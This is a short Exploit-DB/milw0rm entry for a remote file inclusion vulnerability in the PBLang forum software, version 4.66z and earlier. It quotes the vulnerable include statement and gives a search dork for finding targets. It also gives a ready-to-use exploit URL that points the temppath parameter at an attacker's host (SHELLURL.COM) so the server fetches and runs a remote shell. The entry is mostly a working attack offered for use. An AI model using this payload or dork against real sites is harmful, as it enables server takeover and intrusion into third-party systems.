exploit-db-mirror/exploits/php/webapps/2428.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
1.4 KiB
Text

#==============================================================================================
#Software PBLang <= v4.66z (temppath) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://sourceforge.net/projects/pblang/
#
#Version : 4.66z & All Versions Bellow
#
#================================================================================================
#
#Dork : "Software PBLang 4.66z" & "Software PBLang 4.60" or "Software PBLang"
#
#================================================================================================
#Bug in : templates/pb/language/lang_nl.php
#
#Vlu Code :
#--------------------------------
#
# include($temppath.'/pb/language/lang_en.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/templates/pb/language/lang_nl.php?temppath=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRoN & Simoo & Saudi HAckerz
==================================================================================================
# milw0rm.com [2006-09-25]